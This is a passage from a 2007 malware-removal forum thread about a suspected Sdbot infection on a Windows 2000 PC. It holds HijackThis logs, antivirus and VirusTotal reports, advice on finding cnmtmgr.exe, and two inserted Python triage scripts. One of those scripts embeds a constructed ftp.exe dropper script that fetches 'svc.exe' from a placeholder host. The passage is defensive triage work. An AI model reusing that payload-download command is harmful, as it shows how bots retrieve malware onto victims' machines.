    O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
    O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
    O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

    --
    End of file - 3617 bytes

    Scanning Report
    Thursday, August 30, 2007 10:37:47 - 10:56:04

    Computer name: PARKS-Z240HYQ5A
    Scanning type: Scan system for viruses, rootkits, spyware
    Target: C:\
    Result: 4 malware found
    Alexa (spyware)

    * System (Disinfected)

    Text/BotFTP.gen (virus)

    * C:\WINNT\SYSTEM32\I (Submitted)

    Tracking Cookie (spyware)

    * System (Disinfected)
    * System

    Statistics
    Scanned:

    * Files: 15099
    * System: 2788
    * Not scanned: 2

    Actions:

    * Disinfected: 2
    * Renamed: 0
    * Deleted: 0
    * None: 2
    * Submitted: 1

    Files not scanned:

    * C:\PAGEFILE.SYS
    * C:\WINNT\SYSTEM32\CONFIG\DEFAULT

    Options
    Scanning engines:

    * F-Secure AVP: 7.0.171, 2007-08-30
    * F-Secure Blacklight: 1.0.64
    * F-Secure Draco: 1.0.35, 0593-150-72
    * F-Secure Libra: 2.4.2, 2007-08-28
    * F-Secure Orion: 1.2.37, 2007-08-30
    * F-Secure Pegasus: 1.19.0, 2007-07-19

    Scanning options:

    * Scan defined files: COM EXE SYS OV? BIN SCR DLL SHS HTM HTML HTT VBS JS INF VXD DO? XL? RTF CPL WIZ HTA PP? PWZ P?T MSO PIF . ACM ASP AX CNV CSC DRV INI MDB MPD MPP MPT OBD OBT OCX PCI TLB TSP WBK WBT WPC WSH VWP WML BOO HLP TD0 TT6 MSG ASD JSE VBE WSC CHM EML PRC SHB LNK WSF {* PDF ZL? XML ZIP XXXANI AVB BAT CMD LSP MAP MHT MIF PHP POT WMF NWS TAR
    * Use Advanced heuristics

    File i received on 08.30.2007 18:51:27 (CET)
    Result: 8/32 (25%)

    Antivirus Version Last Update Result
    AhnLab-V3 2007.8.31.0 2007.08.30 -
    AntiVir 7.4.1.66 2007.08.30 -
    Authentium 4.93.8 2007.08.29 -
    Avast 4.7.1029.0 2007.08.29 -
    AVG 7.5.0.484 2007.08.29 -
    BitDefender 7.2 2007.08.30 -
    CAT-QuickHeal 9.00 2007.08.30 -
    ClamAV 0.91.2 2007.08.30 Trojan.Downloader.Bat.Ftp.gen-1
    DrWeb 4.33 2007.08.30 -
    eSafe 7.0.15.0 2007.08.29 -
    eTrust-Vet 31.1.5095 2007.08.30 -
    Ewido 4.0 2007.08.30 -
    FileAdvisor 1 2007.08.30 -
    Fortinet 3.11.0.0 2007.08.30 BAT/Dloader.AB!worm
    F-Prot 4.3.2.48 2007.08.29 -
    F-Secure 6.70.13030.0 2007.08.30 Text/BotFTP.gen
    Ikarus T3.1.1.12 2007.08.30 -
    Kaspersky 4.0.2.24 2007.08.30 -
    McAfee 5109 2007.08.30 W32/Sdbot.worm!ftp
    Microsoft 1.2803 2007.08.30 TrojanDownloader:BAT/Ftper.gen
    NOD32v2 2492 2007.08.30 -
    Norman 5.80.02 2007.08.30 Text/BotFTP.gen
    Panda 9.0.0.4 2007.08.29 -
    Prevx1 V2 2007.08.30 -
    Rising 19.38.32.00 2007.08.30 -
    Sophos 4.21.0 2007.08.30 Mal/BotFTP-A
    Sunbelt 2.2.907.0 2007.08.25 -
    Symantec 10 2007.08.30 -
    TheHacker 6.1.9.175 2007.08.30 W32/SdBot.worm
    VBA32 3.12.2.3 2007.08.30 -
    VirusBuster 4.3.26:9 2007.08.30 -
    Webwasher-Gateway 6.0.1 2007.08.30 -
    Additional information
    File size: 77 bytes
    MD5: 4b169ca597ed0c1cf2ecf51e651273f7
    SHA1: cfe0917ffb45c0077993143e9c13eb8b8f42841d

    ATTENTION: VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is no solution that offers a 100% effectiveness rate for detecting viruses and malware.
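    Two checks a responder would run on a file like C:\WINNT\SYSTEM32\I before deleting it: record its MD5 and SHA-1 and confirm they match what VirusTotal printed, so the bytes on disk and the verdict refer to the same file; and look at what it is. The engine names above (Trojan.Downloader.Bat.Ftp, BAT/Dloader, Text/BotFTP.gen, W32/Sdbot.worm!ftp, TrojanDownloader:BAT/Ftper.gen) all denote one generic class, a plain-text command script for ftp.exe (run with `ftp -n -s:<script>`) that a bot drops to fetch its payload. The script below does both and is an added example for this thread, not part of the thread or of any of the tools named in it. The two known hashes are the ones VirusTotal reported in the post above; the sample script content is constructed, since the thread never shows the real file's contents, and the 192.0.2.x address is a documentation range.

```python
"""Hash a suspicious small file and test whether it reads as an FTP command
script of the kind bot droppers use.  Added example, not from the thread."""
import hashlib

# Hashes VirusTotal reported in the post above for the 77-byte file.
KNOWN_MD5 = "4b169ca597ed0c1cf2ecf51e651273f7"
KNOWN_SHA1 = "cfe0917ffb45c0077993143e9c13eb8b8f42841d"

# Constructed sample: the typical shape of a dropper's ftp.exe script.  This
# is NOT the poster's file (the thread does not show its contents), and
# 192.0.2.0/24 is a documentation address range.
SAMPLE_SCRIPT = b"open 192.0.2.10 3921\r\nuser x x\r\nbinary\r\nget svc.exe\r\nbye\r\n"

# Verbs ftp.exe accepts that such scripts are built from.
FTP_VERBS = {"open", "user", "pass", "binary", "bin", "ascii", "prompt",
             "cd", "lcd", "get", "mget", "recv", "bye", "quit", "close"}


def hashes(data: bytes) -> dict:
    """MD5 and SHA-1 in the hex form VirusTotal prints, plus the size."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "size": len(data)}


def matches_known(data: bytes) -> bool:
    """True only when both digests agree with the VirusTotal report."""
    h = hashes(data)
    return h["md5"] == KNOWN_MD5 and h["sha1"] == KNOWN_SHA1


def looks_like_ftp_script(data: bytes, max_size: int = 512,
                          min_ratio: float = 0.8) -> bool:
    """A small ASCII file with an 'open <host>' line, a download verb, and
    mostly ftp verbs overall is treated as an ftp.exe command script."""
    if not data or len(data) > max_size:
        return False
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:          # binaries (e.g. an MZ header) fail here
        return False
    lines = [ln.strip().lower() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return False
    verbs = [ln.split()[0] for ln in lines]
    has_open = any(v == "open" and len(ln.split()) >= 2
                   for v, ln in zip(verbs, lines))
    has_get = any(v in ("get", "mget", "recv") for v in verbs)
    ratio = sum(v in FTP_VERBS for v in verbs) / len(verbs)
    return has_open and has_get and ratio >= min_ratio


def triage_bytes(data: bytes) -> dict:
    h = hashes(data)
    h["matches_virustotal"] = matches_known(data)
    h["ftp_script"] = looks_like_ftp_script(data)
    return h


def triage_file(path: str) -> dict:
    """Open read-only in binary mode so the evidence is not altered."""
    with open(path, "rb") as fh:
        return triage_bytes(fh.read())


if __name__ == "__main__":
    for key, value in triage_bytes(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

    Keep the hashes with your notes before the file is deleted or renamed; once it is gone, the VirusTotal report is the only record of what was on the machine. A low engine count on a tiny text file says little either way: several engines do not flag FTP scripts at all, and the VirusTotal notice quoted above makes the same point about negative results.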

  6. #26
    pskelley (In Memoriam - Always in our heart)
    Join Date
    Oct 2005
    Location
    Clearwater, Florida
    Posts
    20,247


    Let's try to clear the air a little:

    1) I have no desire to see tracking cookies that are a part of surfing, you are going to get them if you go on the internet. Here is what they are:
    http://en.wikipedia.org/wiki/HTTP_cookie if you wish to control them, here is how:
    http://www.mvps.org/winhelp2002/cookies.htm
    http://www.microsoft.com/windows/ie/...cy/config.mspx

    2) You are using a beta version of HJT, please delete it from your computer and download a self-installing version which will install itself in the proper location if you will follow the prompts:
    http://www.trendsecure.com/portal/en...HJTInstall.exe

    Post a new HJT log and describe any malware symptoms. Please do not tell me about any tracking cookies.

    Thank you

    Thanks
    Last edited by pskelley; 2007-08-30 at 19:58. Reason: add information

  7. #27
    Member
    Join Date
    Jun 2007
    Location
    Canada
    Posts
    89


    Text/BotFTP.gen (virus)

    * C:\WINNT\SYSTEM32\I (Submitted)
    This is what I was thinking about, not the tracking cookies; those I don't worry about that badly. I uploaded that file to VirusTotal and it came back 25% as a BOT or SDWorm, or other suggested trojan as well.

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 1:23:58 PM, on 30/08/2007
    Platform: Windows 2000 SP4 (WinNT 5.00.2195)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
    Boot mode: Normal

    Running processes:
    C:\WINNT\System32\smss.exe
    C:\WINNT\system32\winlogon.exe
    C:\WINNT\system32\services.exe
    C:\WINNT\system32\lsass.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\WINNT\system32\svchost.exe
    C:\WINNT\system32\spoolsv.exe
    C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
    C:\WINNT\System32\svchost.exe
    C:\WINNT\cnmtmgr.exe
    C:\WINNT\system32\MSTask.exe
    C:\WINNT\System32\WBEM\WinMgmt.exe
    C:\WINNT\system32\svchost.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
    C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
    C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    C:\WINNT\System32\svchost.exe
    C:\WINNT\explorer.exe
    C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
    C:\WINNT\system32\ZoneLabs\vsmon.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer Provided by SHAW Internet
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
    O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
    O4 - HKLM\..\Run: [shawnotify] c:\progra~1\shaw\update\updateloader.exe /notify
    O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
    O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe"
    O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
    O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
    O16 - DPF: {0B79F48A-E8D6-11DB-9283-E25056D89593} (F-Secure Online Scanner 3.1) - http://support.f-secure.com/ols/fscax.cab
    O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
    O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
    O16 - DPF: {49E71DB9-E803-43BA-AF81-1CAF61A6C4CB} (F-Secure Online Scanner 3.2) - http://support.f-secure.com/ols/beta/fscax.cab
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188412521140
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
    O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
    O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

    --
    End of file - 3650 bytes

  8. #28
    In Memoriam -Always in our heart pskelley's Avatar
    Join Date
    Oct 2005
    Location
    Clearwater, Florida
    Posts
    20,247

    Default

    http://virusscan.jotti.org/
    http://www.kaspersky.com/scanforvirus
    http://www.virustotal.com/

    C:\WINNT\cnmtmgr.exe <<< scan that file, if it is bad, delete it

    C:\WINNT\SYSTEM32\I <<< this has to be I something? I.exe ? I.dll ?
    I can not google I

    If you scanned it and it came back bad, delete it. You are going to need a file ending though.

    Here is a tool that can delete the junk for you if they give you trouble.
    How to use the Delete on Reboot tool
    http://www.bleepingcomputer.com/tuto...42.html#delreb

    Thanks
    MS-MVP Consumer Security 2007-08-09
    Proud Member ASAP
    UNITE Member 2006

  9. #29
    Member
    Join Date
    Jun 2007
    Location
    Canada
    Posts
    89

    Default

    I cannot find the file C:\WINNT\cnmtmgr.exe on my own; as far as I can tell I have all files visible, including hidden ones. So I am curious as to where it is. I manually typed in the file name and VirusTotal managed to upload it, and here are the results. Now how do I find it to delete it? The other file, C:\WINNT\system32\I, has not got a designation (exe, cab, dll, etc.); it was listed as file type: file when I looked at the properties of it. So I deleted it; hopefully that took care of that part and it does not return if it is a bad file. Please advise. ty
    mightyuselessone


    File cnmtmgr.exe received on 08.30.2007 21:54:38 (CET)
    Result: 7/32 (21.88%)
    Antivirus Version Last Update Result
    AhnLab-V3 2007.8.31.0 2007.08.30 -
    AntiVir 7.4.1.66 2007.08.30 HEUR/Crypted
    Authentium 4.93.8 2007.08.29 -
    Avast 4.7.1029.0 2007.08.30 -
    AVG 7.5.0.484 2007.08.30 -
    BitDefender 7.2 2007.08.30 DeepScan:Generic.Sdbot.30E42382
    CAT-QuickHeal 9.00 2007.08.30 -
    ClamAV 0.91.2 2007.08.30 -
    DrWeb 4.33 2007.08.30 -
    eSafe 7.0.15.0 2007.08.29 -
    eTrust-Vet 31.1.5095 2007.08.30 -
    Ewido 4.0 2007.08.30 -
    FileAdvisor 1 2007.08.30 -
    Fortinet 3.11.0.0 2007.08.30 -
    F-Prot 4.3.2.48 2007.08.29 -
    F-Secure 6.70.13030.0 2007.08.30 -
    Ikarus T3.1.1.12 2007.08.30 Generic.Sdbot
    Kaspersky 4.0.2.24 2007.08.30 -
    McAfee 5109 2007.08.30 -
    Microsoft 1.2803 2007.08.30 -
    NOD32v2 2492 2007.08.30 -
    Norman 5.80.02 2007.08.30 -
    Panda 9.0.0.4 2007.08.29 -
    Prevx1 V2 2007.08.30 Generic.Malware
    Rising 19.38.32.00 2007.08.30 -
    Sophos 4.21.0 2007.08.30 -
    Sunbelt 2.2.907.0 2007.08.25 VIPRE.Suspicious
    Symantec 10 2007.08.30 W32.Spybot.Worm
    TheHacker 6.1.9.175 2007.08.30 -
    VBA32 3.12.2.3 2007.08.30 -
    VirusBuster 4.3.26:9 2007.08.30 -
    Webwasher-Gateway 6.0.1 2007.08.30 Heuristic.Crypted
    Additional information
    File size: 512000 bytes
    MD5: 750b6410cc7f0b2d029c5c19f7cc8277
    SHA1: 4ecee6b3812cf13197ea96f4920c0d80cf3dbdd3
    packers: Themida
    Prevx info: http://fileinfo.prevx.com/fileinfo.a...20A10002CDF62E
    Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

  10. #30
    In Memoriam -Always in our heart pskelley's Avatar
    Join Date
    Oct 2005
    Location
    Clearwater, Florida
    Posts
    20,247

    Default

    Look at the last HJT log you posted:
    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 1:23:58 PM, on 30/08/2007

    You only have 16 items that start with C:\WINNT\

    and it is one of them:
    C:\WINNT\cnmtmgr.exe

    Use Search Companion to locate it; the hackers do not make it easy, it could be in Temp, Prefetch or elsewhere.
    It needs to be located and deleted, and you are the only one that can do it. Be patient with Search Companion; there are a lot of files to look through.

    Thanks
    MS-MVP Consumer Security 2007-08-09
    Proud Member ASAP
    UNITE Member 2006
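Added example (not a tool from this thread, and not pskelley's method): a small Python triage script that applies the check pskelley is doing by eye to an abridged, constructed excerpt of the HJT log above. It lists running processes that neither belong to an assumed short set of core Windows 2000 components nor have a visible O4 (Run key) or O23 (service) entry launching them; on the log above that leaves C:\WINNT\cnmtmgr.exe, the file the thread ends up scanning.

```python
import re

# Abridged excerpt of the HJT log posted above (constructed test input).
HJT_LOG = r"""Running processes:
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\cnmtmgr.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\WINNT\explorer.exe
C:\WINNT\system32\ZoneLabs\vsmon.exe

O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe"
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe
"""

# Assumed-benign core Windows 2000 processes, plus the scanner itself.
CORE = {"smss.exe", "winlogon.exe", "services.exe", "lsass.exe", "svchost.exe",
        "spoolsv.exe", "explorer.exe", "mstask.exe", "hijackthis.exe"}

# First drive-letter path ending in .exe on a line (quotes and arguments ignored).
EXE_PATH = re.compile(r'[A-Za-z]:\\[^"\r\n]*?\.exe', re.IGNORECASE)

def running_processes(log):
    """Paths listed under 'Running processes:' up to the first blank line."""
    procs, active = [], False
    for line in log.splitlines():
        if line.startswith("Running processes:"):
            active = True
        elif active and not line.strip():
            break
        elif active:
            procs.append(line.strip())
    return procs

def autostart_basenames(log):
    """Lower-cased file names launched by O4 (Run key) and O23 (service) entries."""
    names = set()
    for line in log.splitlines():
        if line.startswith(("O4 -", "O23 -")):
            m = EXE_PATH.search(line)
            if m:
                names.add(m.group(0).split("\\")[-1].lower())
    return names

def unaccounted(log):
    """Running processes with no core-OS or autostart explanation: worth scanning first."""
    known = CORE | autostart_basenames(log)
    return [p for p in running_processes(log)
            if p.split("\\")[-1].lower() not in known]
```

A process with no launch entry can still be legitimate (or started from a location HJT does not list), so the output is a scan list, not a delete list.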
